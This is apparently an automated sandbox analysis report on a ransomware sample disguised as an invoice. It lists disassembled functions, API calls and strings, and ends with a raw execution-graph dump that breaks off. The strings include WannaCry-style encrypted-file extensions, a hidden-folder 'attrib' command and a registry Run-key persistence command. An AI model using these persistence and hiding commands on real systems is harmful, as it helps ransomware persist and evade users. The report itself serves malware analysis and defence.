                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                            • API String ID: 2238633743-1294736154
                                                            • Opcode ID: 944c07b6a276cea25272870ffcbc7163b6e1cefb521ad04e65f91ac777977517
                                                            • Instruction ID: cf0c78403fd2c3fefe85ed3b1817818ef30dc00b537cc7000bee59f2d7a133bb
                                                            • Opcode Fuzzy Hash: 944c07b6a276cea25272870ffcbc7163b6e1cefb521ad04e65f91ac777977517
                                                            • Instruction Fuzzy Hash: C7111234A132256AFB56FB25AC94EBF27D9FF857C0302402BE501D725CDB65A841CA60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10002D60 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$wcsrchr
                                                            • String ID: .WNCRY$.WNCRYT$.WNCYR$.dll$.exe
                                                            • API String ID: 2496260227-3981601049
                                                            • Opcode ID: 5903ff2edf89349bd2686ef71d84bc7708304c14f2e0e0755f497b2b138f29db
                                                            • Instruction ID: c174833711b2fb1714a36c3f2b07131fd7d14ecb9d1a9f70295dd6690f64d7bf
                                                            • Opcode Fuzzy Hash: 5903ff2edf89349bd2686ef71d84bc7708304c14f2e0e0755f497b2b138f29db
                                                            • Instruction Fuzzy Hash: B8218E3264025153F620D229ED84F976398CBD46F6F05803BEE08D6248E729EC6AD175
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10005060 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104,?,?), ref: 10005075
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 10005094
                                                            • wcslen.MSVCRT ref: 100050A1
                                                            • wcslen.MSVCRT ref: 100050AB
                                                            • wcslen.MSVCRT ref: 100050B9
                                                            • swprintf.MSVCRT(?,%C:\%s,?,$RECYCLE), ref: 100050DC
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 100050E8
                                                            • sprintf.MSVCRT ref: 100050FE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: wcslen$Directory$CreatePathTempWindowssprintfswprintf
                                                            • String ID: $RECYCLE$$RECYCLE$%C:\%s$attrib +h +s %C:\%s
                                                            • API String ID: 3936433386-879418404
                                                            • Opcode ID: 0b1339ff9ccf8e90c4efee76c57af1fa94f7e944c16739319b4056cf68cb0408
                                                            • Instruction ID: 53406f09da6477a7470ce20e768b81243a585eb0d3560c4a70511fa70a1d7675
                                                            • Opcode Fuzzy Hash: 0b1339ff9ccf8e90c4efee76c57af1fa94f7e944c16739319b4056cf68cb0408
                                                            • Instruction Fuzzy Hash: EC110671A00620A7F320E7189C8AFCF37A8EFC4785F414419F749A2188E779610987EB
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10005540 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchangeAdd.KERNEL32(1000D4E4,00000000), ref: 1000557E
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 100055AE
                                                            • Sleep.KERNEL32(000003E8), ref: 100055CB
                                                            • GetDriveTypeW.KERNEL32(?), ref: 100055E9
                                                            • GetDriveTypeW.KERNEL32(00000000,00000000,00000019,75AA3300,00000000), ref: 100055FD
                                                            • InterlockedExchange.KERNEL32(1000D4E4,?), ref: 1000560A
                                                            • GetDriveTypeW.KERNEL32(?), ref: 10005615
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: DriveType$ExchangeInterlocked$DiskFreeSleepSpace
                                                            • String ID: :\
                                                            • API String ID: 3294574733-2155371604
                                                            • Opcode ID: 61cea2a78f95dfb05a4314cfbf4166deab6280a281f2e8abaf9f34550cafe113
                                                            • Instruction ID: f64d85ad46bc30538c74047da36dc2f651c409be43941944ac19416e7c7c5497
                                                            • Opcode Fuzzy Hash: 61cea2a78f95dfb05a4314cfbf4166deab6280a281f2e8abaf9f34550cafe113
                                                            • Instruction Fuzzy Hash: 88318432504316ABE740DF54DC84E9FB3E9FB84681F400E19F545D7158E776EA09C7A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100014A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 100014AE
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: rand$wcslen$ComputerNamesrand
                                                            • String ID: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                            • API String ID: 3058258771-3674288975
                                                            • Opcode ID: c011ee3e19930f07226b05525630f8276d34537d1db21e69fd792623f7418817
                                                            • Instruction ID: 6bdad6a71d273d2ba545fc7a1d4ce55d05bb8ce7e3220b07caf5c040d7fd5cbd
                                                            • Opcode Fuzzy Hash: c011ee3e19930f07226b05525630f8276d34537d1db21e69fd792623f7418817
                                                            • Instruction Fuzzy Hash: F2213D3150475587F311DB18DC817DBB3D5EBC5750F01092DE99A87285E639990F87B3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003810 Relevance: 10.6, APIs: 7, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000386E
                                                            • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 10003876
                                                            • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 100038AD
                                                            • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 100038BA
                                                            • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 100038C2
                                                            • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 100038F9
                                                            • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000393A
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                                            • String ID:
                                                            • API String ID: 2613176527-0
                                                            • Opcode ID: 419391cea48095fa9c56488878e65c16131f7775e920f671397da16b97c4db23
                                                            • Instruction ID: c1de8fb6cb3a72026dff4bd4d186f336055b31e35bdbf535d2fbb9e5f9aed039
                                                            • Opcode Fuzzy Hash: 419391cea48095fa9c56488878e65c16131f7775e920f671397da16b97c4db23
                                                            • Instruction Fuzzy Hash: 3C41E171A00B518FD711DF1DC8C4A9AF7E6FB89790B50C85EE49A87399CB35A841CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10001760 Relevance: 10.6, APIs: 7, Instructions: 58filesynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BBB
                                                              • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BD0
                                                              • Part of subcall function 10003BB0: CryptReleaseContext.ADVAPI32(?,00000000,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BE7
                                                            • GlobalFree.KERNEL32(?), ref: 10001797
                                                            • GlobalFree.KERNEL32(?), ref: 100017C0
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,100016B2,75AA0F00,75AA2EE0,00000000,?,00000000,10006DEF,000000FF,10005AC5), ref: 100017E3
                                                            • CloseHandle.KERNEL32(?), ref: 100017F0
                                                            • DeleteCriticalSection.KERNEL32(?,?,00000000,100016B2,75AA0F00,75AA2EE0,00000000,?,00000000,10006DEF,000000FF,10005AC5), ref: 10001807
                                                            • wcslen.MSVCRT ref: 10001814
                                                            • DeleteFileW.KERNEL32(?,75AA0F10), ref: 10001822
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Crypt$DeleteDestroyFreeGlobal$CloseContextCriticalFileHandleObjectReleaseSectionSingleWaitwcslen
                                                            • String ID:
                                                            • API String ID: 1629502191-0
                                                            • Opcode ID: 33c5ca710b395fa90b6c0262d6d3b5fcc069b9a43ede1909023ffbbaa47dbda2
                                                            • Instruction ID: f586c4f20a923c2549891f38ad5cae4d46359d9a66e1c91433b4026ce85e5b09
                                                            • Opcode Fuzzy Hash: 33c5ca710b395fa90b6c0262d6d3b5fcc069b9a43ede1909023ffbbaa47dbda2
                                                            • Instruction Fuzzy Hash: 6D114CB45056118BF351EB38C888BD7B7E8FF44284F01451DE69E97294CFB4A8448BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100047F0 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 10001360: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,7598F130), ref: 1000139C
                                                            • sprintf.MSVCRT ref: 10004863
                                                            Strings
                                                            • M, xrefs: 10004819
                                                            • L, xrefs: 10004814
                                                            • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 100047FD
                                                            • cmd.exe /c reg add %s /v "%s" /t REG_SZ /d "\"%s\"" /f, xrefs: 1000485D
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AllocateInitializesprintf
                                                            • String ID: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run$L$M$cmd.exe /c reg add %s /v "%s" /t REG_SZ /d "\"%s\"" /f
                                                            • API String ID: 568869838-3541944315
                                                            • Opcode ID: bf5c0829c5f729f0c32795c81225613645d0478752b7bd72f04b3b82bf7e2ebe
                                                            • Instruction ID: cb81d63c27e7438ee873a6580c8d427ba87cf58f5dd356eba86e26e33131f037
                                                            • Opcode Fuzzy Hash: bf5c0829c5f729f0c32795c81225613645d0478752b7bd72f04b3b82bf7e2ebe
                                                            • Instruction Fuzzy Hash: 67012471508380BAF354D318C840BEF7BA8DFC5388F408C2EBAC887295DAB59548C7A3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10002940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: wcscat$DeleteFile
                                                            • String ID: .WNCYR
                                                            • API String ID: 2874565005-3780910188
                                                            • Opcode ID: 89d4098d6f193e1b9fa4b3174060334de28b51d85d2f5b150166bc60bd8e7cb4
                                                            • Instruction ID: a3bc17cf7ef854a2158c8400b310fe5ef82d5dee7fb413dfc94f73b9db8610d0
                                                            • Opcode Fuzzy Hash: 89d4098d6f193e1b9fa4b3174060334de28b51d85d2f5b150166bc60bd8e7cb4
                                                            • Instruction Fuzzy Hash: FEF0C83221011067F360E75CDC40FDF6298EFD53A0F010417F244D2148C7A4A94287A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100012D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 100011D0: GetCurrentProcess.KERNEL32 ref: 100011E4
                                                              • Part of subcall function 100011D0: OpenProcessToken.ADVAPI32(00000000), ref: 100011EB
                                                            • GetUserNameW.ADVAPI32 ref: 10001321
                                                            • _wcsicmp.MSVCRT ref: 10001331
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentNameOpenTokenUser_wcsicmp
                                                            • String ID: S-1-5-18$SYSTEM
                                                            • API String ID: 3198372872-1369567957
                                                            • Opcode ID: cf50642f78ef5fab84ecba59a6cf7af1d6290f6db1426ef5f0d617c8ec868925
                                                            • Instruction ID: 10a86b0ae793a7b0faed46c7c3bb17ce0abdb28c641acd7ed0c6d67178d7bc95
                                                            • Opcode Fuzzy Hash: cf50642f78ef5fab84ecba59a6cf7af1d6290f6db1426ef5f0d617c8ec868925
                                                            • Instruction Fuzzy Hash: FFF04475808701ABF704DB54DC44AEF73E4EBC4785F508928F94982194F7389659C797
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10001910 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcscpy.MSVCRT ref: 10001920
                                                            • swprintf.MSVCRT(?,%s\%d%s,?,?,.WNCRYT), ref: 1000194B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: swprintfwcscpy
                                                            • String ID: %s\%d%s$.WNCRYT
                                                            • API String ID: 2253494011-2625268679
                                                            • Opcode ID: 000e3091f5fb392741d9349167afd51cb84987f96780d8c4e66d3e6cc1a6ed01
                                                            • Instruction ID: 3af0f3f7c414dc9b2a655466e87540e4a569b33180c9e8bcda9b168f9dff8f6e
                                                            • Opcode Fuzzy Hash: 000e3091f5fb392741d9349167afd51cb84987f96780d8c4e66d3e6cc1a6ed01
                                                            • Instruction Fuzzy Hash: 1AE04FB7900610AFE310CB18DC89DEB77A8EBD9301F05052AFA4E97285DBB57915CBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:0.3%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:46.3%
                                                            Total number of Nodes:460
                                                            Total number of Limit Nodes:42
                                                            execution_graph 129422 6cd912f9 129423 6cd91300 129422->129423 129440 6cddff00 129423->129440 129425 6cd91305 129426 6cd91318 129425->129426 129428 6cd912a4 129425->129428 129455 6cd91040 7 API calls 129426->129455 129429 6cd912e3 129428->129429 129433 6cd912b7 129428->129433 129430 6cd9131d 129430->129429 129431 6cd9133d 129430->129431 129432 6cd91360 129430->129432 129431->129429 129456 6cd91040 7 API calls 129431->129456 129432->129433 129457 6cde01e0 _lock __dllonexit _unlock _onexit 129432->129457 129433->129428 129454 6cd91040 7 API calls 129433->129454 129436 6cd912dc 129436->129429 129438 6cd9136a 129438->129429 129458 6cd91040 7 API calls 129438->129458 129441 6cddff09 129440->129441 129446 6cddff10 129440->129446 129441->129425 129442 6cde0003 129442->129425 129443 6cde019b 129444 6cddfd60 13 API calls 129443->129444 129452 6cde01ab 129444->129452 129445 6cddfdc0 13 API calls 129445->129446 129446->129442 129446->129443 129446->129445 129447 6cddfff3 129446->129447 129448 6cde0076 VirtualQuery 129446->129448 129447->129442 129459 6cddfd60 fwrite vfprintf abort 129447->129459 129450 6cde009c VirtualProtect 129448->129450 129451 6cde0176 129448->129451 129450->129446 129453 6cddfd60 13 API calls 129451->129453 129452->129425 129453->129443 129454->129436 129455->129430 129456->129436 129457->129438 129458->129433 129460 6cddfdc0 129459->129460 129461 6cddfeea 129460->129461 129463 6cddfe2e VirtualQuery 129460->129463 129467 6cddfe9f 129460->129467 129462 6cddfd60 5 API calls 129461->129462 129475 6cddfefa 129462->129475 129464 6cddfe5d 129463->129464 129465 6cddfeca 129463->129465 129464->129467 129468 6cddfe71 VirtualProtect 129464->129468 129465->129461 129466 6cddfd60 5 API calls 129465->129466 129466->129461 129467->129442 129468->129467 129469 6cddfeb4 GetLastError 129468->129469 129470 6cddfd60 5 API calls 129469->129470 129470->129465 129471 6cddff09 129471->129442 129472 6cde019b 129473 6cddfd60 5 API calls 129472->129473 129481 6cde01ab 129473->129481 129474 6cddfdc0 VirtualQuery VirtualProtect GetLastError VirtualQuery VirtualProtect 129474->129475 129475->129471 129475->129472 129475->129474 129476 6cddfff3 129475->129476 129477 6cde0076 VirtualQuery 129475->129477 129476->129471 129478 6cddfd60 5 API calls 129476->129478 129479 6cde009c VirtualProtect 129477->129479 129480 6cde0176 129477->129480 129478->129471 129479->129475 129482 6cddfd60 5 API calls 129480->129482 129481->129442 129482->129472 129483 6cd6be90 129486 6cd6beb9 129483->129486 129489 6cd6bf10 129483->129489 129484 6cd6bfe5 129485 6cd6c07a __stack_chk_fail 129487 6cd6c030 129486->129487 129488 6cd6bef3 malloc 129486->129488 129486->129489 129488->129489 129489->129484 129489->129485 129490 6cd6c940 129505 6cd6c976 129490->129505 129491 6cd6c8e0 malloc 129492 6cd6c9ba 129491->129492 129495 6cd6c90e 129491->129495 129496 6cd6c9e4 memcpy 129492->129496 129497 6cd6d965 memcpy 129492->129497 129493 6cd6ca21 129494 6cd6ca87 129493->129494 129501 6cd6d930 adler32 129493->129501 129502 6cd6ca6c crc32 129493->129502 129494->129495 129498 6cd6d890 129494->129498 129503 6cd6c933 129495->129503 129504 6cd6e711 __stack_chk_fail 129495->129504 129499 6cd6d9b1 memcpy 129496->129499 129500 6cd6ca0e 129496->129500 129506 6cd6d9a5 129497->129506 129498->129501 129499->129504 129500->129493 129500->129506 129502->129494 129507 6cd6e716 129504->129507 129505->129491 129505->129492 129505->129493 129506->129499 129508 6ce2347a 129509 6ce23482 realloc 129508->129509 129510 6ce234cb 129508->129510 129509->129510 129512 6ce212f9 129517 6cf94c20 129512->129517 129514 6ce21305 129516 6ce212e3 129514->129516 129535 6cf94f00 _lock __dllonexit _unlock _onexit 129514->129535 129518 6cf94c29 129517->129518 129520 6cf94c30 129517->129520 129518->129514 129519 6cf94d23 129519->129514 129520->129519 129522 6cf94d2b 129520->129522 129527 6cf94cbe 129520->129527 129521 6cf94ebb 129523 6cf94a80 13 API calls 129521->129523 129522->129519 129525 6cf94d67 129522->129525 129564 6cf94ae0 129522->129564 129533 6cf94ecb 129523->129533 129525->129519 129529 6cf94d96 VirtualQuery 129525->129529 129526 6cf94ae0 13 API calls 129526->129527 129527->129519 129527->129521 129527->129525 129527->129526 129528 6cf94d13 129527->129528 129536 6cf94a80 fwrite vfprintf abort 129528->129536 129531 6cf94dbc VirtualProtect 129529->129531 129532 6cf94e96 129529->129532 129531->129525 129534 6cf94a80 13 API calls 129532->129534 129533->129514 129534->129521 129535->129516 129538 6cf94ae0 129536->129538 129537 6cf94bbf 129537->129519 129538->129537 129539 6cf94c0a 129538->129539 129541 6cf94b4e VirtualQuery 129538->129541 129540 6cf94a80 5 API calls 129539->129540 129548 6cf94c1a 129540->129548 129542 6cf94bea 129541->129542 129543 6cf94b7d 129541->129543 129542->129539 129544 6cf94a80 5 API calls 129542->129544 129543->129537 129545 6cf94b91 VirtualProtect 129543->129545 129544->129539 129545->129537 129546 6cf94bd4 GetLastError 129545->129546 129547 6cf94a80 5 API calls 129546->129547 129547->129542 129549 6cf94d2b 129548->129549 129554 6cf94c29 129548->129554 129555 6cf94cbe 129548->129555 129552 6cf94ae0 5 API calls 129549->129552 129553 6cf94d67 129549->129553 129549->129554 129550 6cf94ebb 129551 6cf94a80 5 API calls 129550->129551 129562 6cf94ecb 129551->129562 129552->129549 129553->129554 129557 6cf94d96 VirtualQuery 129553->129557 129554->129519 129555->129550 129555->129553 129555->129554 129556 6cf94d13 129555->129556 129559 6cf94ae0 VirtualQuery VirtualProtect GetLastError VirtualQuery VirtualProtect 129555->129559 129558 6cf94a80 5 API calls 129556->129558 129560 6cf94dbc VirtualProtect 129557->129560 129561 6cf94e96 129557->129561 129558->129554 129559->129555 129560->129553 129563 6cf94a80 5 API calls 129561->129563 129562->129519 129563->129550 129566 6cf94af4 129564->129566 129565 6cf94c0a 129567 6cf94a80 8 API calls 129565->129567 129566->129565 129568 6cf94b4e VirtualQuery 129566->129568 129571 6cf94bbf 129566->129571 129577 6cf94c1a 129567->129577 129569 6cf94bea 129568->129569 129570 6cf94b7d 129568->129570 129569->129565 129572 6cf94a80 8 API calls 129569->129572 129570->129571 129573 6cf94b91 VirtualProtect 129570->129573 129571->129522 129572->129565 129573->129571 129574 6cf94bd4 GetLastError 129573->129574 129575 6cf94a80 8 API calls 129574->129575 129575->129569 129576 6cf94c29 129576->129522 129577->129576 129579 6cf94d2b 129577->129579 129583 6cf94cbe 129577->129583 129578 6cf94ebb 129580 6cf94a80 8 API calls 129578->129580 129579->129576 129581 6cf94ae0 8 API calls 129579->129581 129582 6cf94d67 129579->129582 129590 6cf94ecb 129580->129590 129581->129579 129582->129576 129585 6cf94d96 VirtualQuery 129582->129585 129583->129576 129583->129578 129583->129582 129584 6cf94d13 129583->129584 129587 6cf94ae0 8 API calls 129583->129587 129586 6cf94a80 8 API calls 129584->129586 129588 6cf94dbc VirtualProtect 129585->129588 129589 6cf94e96 129585->129589 129586->129576 129587->129583 129588->129582 129591 6cf94a80 8 API calls 129589->129591 129590->129522 129591->129578 129592 6ced6ba0 129593 6ced6bd4 LoadLibraryA LoadLibraryA 129592->129593 129594 6ced6bf7 GetProcAddress GetProcAddress 129593->129594 129645 6ced6c68 129593->129645 129595 6ced6c98 FreeLibrary 129594->129595 129596 6ced6c30 129594->129596 129597 6ced6caa GetProcAddress GetProcAddress GetProcAddress 129595->129597 129595->129645 129596->129595 129598 6ced6c38 NetStatisticsGet 129596->129598 129597->129645 129601 6ced72b0 RAND_add 129598->129601 129598->129645 129599 6ced6d7c GetVersion 129600 6ced6d8c OPENSSL_isservice 129599->129600 129599->129645 129600->129645 129601->129645 129602 6ced7156 GetProcAddress GetProcAddress GetProcAddress 129602->129645 129603 6ced6dad 12 API calls 129605 6ced7070 FreeLibrary 129603->129605 129603->129645 129604 6ced72f0 RAND_add 129604->129645 129605->129645 129606 